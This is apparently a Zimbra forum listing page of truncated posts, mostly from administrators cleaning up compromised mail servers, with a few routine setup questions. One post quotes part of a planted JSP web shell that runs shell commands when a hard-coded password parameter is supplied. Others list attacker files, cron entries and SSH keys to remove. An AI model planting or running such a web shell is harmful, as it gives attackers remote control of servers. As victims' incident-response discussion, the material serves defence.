Zimbra Forums

As stated in the topic: I need to remove /opt/zimbra/log/zmmailboxd.pid after a zmcontroll restart why?

It happens every now and then when I create a backup of my installation.

Backupscript rsyncs, stop zimbra, rsync, start zimbra (here is the problem).

Any ideas? Thanks!

Hello and thanks for a great thread! Im running a old 8.6 and would like to install a lets encrypt cert... So... I used getssl to generate those files: -rw------- 1 root root 5768 apr 4 15:55 chain.crt -rw------- 1 root root 6076 apr 4 16:21 fullchain.crt -rw------- 1 root root 3448 apr 4 15:41 mym...

Hello and thanks for a great thread! Im running a old 8.6 and would like to install a lets encrypt cert... So... I used getssl to generate those files: -rw------- 1 root root 5768 apr 4 15:55 chain.crt -rw------- 1 root root 6076 apr 4 16:21 fullchain.crt -rw------- 1 root root 3448 apr 4 15:41 myma...

Hi all Zimbras! Im going to install a 8.8 on a Ubuntu 18. First google-hit was this tutorial: https://computingforgeeks.com/how-to-install-zimbra-collaboration-on-ubuntu-18-04-lts/ States I need a DNS-server. Checking docs and searching forum: https://wiki.zimbra.com/wiki/Split_DNS Saying: "Dep...

Help me with this plz : /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh",&quo...

Hi all!

I have a old 5.0 installation running on an old hp-server, dont ask me why. Are the 5.0 affected by the virus?

Anyone knows?

Thanks!

Has anyone with recurring infections checked if the attacker uploaded a key to /opt/zimbra/.ssh/authorized_keys ? Or if there are remote ssh logins for the zimbra user? Yes, apparently the chinese guys takes control of zimbra user, they load a tons of script en /tmp/ and /opt/zimbra/log/ some are h...

elby wrote:

zimbraxtc wrote:

Drake wrote:Hello guys

Thanks!

Dont miss:
/opt/zimbra/log/zmswatch and zmswatch.sh

This is a zimbra files or exploit ?

My crontab is empty. How can i regenerate it?

exploit, just remove them

might be a differnt path to your crontab, mine is /var/spool/cron/crontabs/zimbra

Drake wrote:Hello guys

Thanks!

Dont miss:
/opt/zimbra/log/zmswatch and zmswatch.sh

Hello all! I have the same issue on a 8.6 Ubuntu. - added patch - clean /var/spool/cron/crontabs/zimbra (line at the end) - clean /opt/zimbra/log/zmswatch and zmswatch.sh - removed added email-accounts (only one) - changed the admin-pass for zimbra-user - cant find any strange .jsp-files. - clean /o...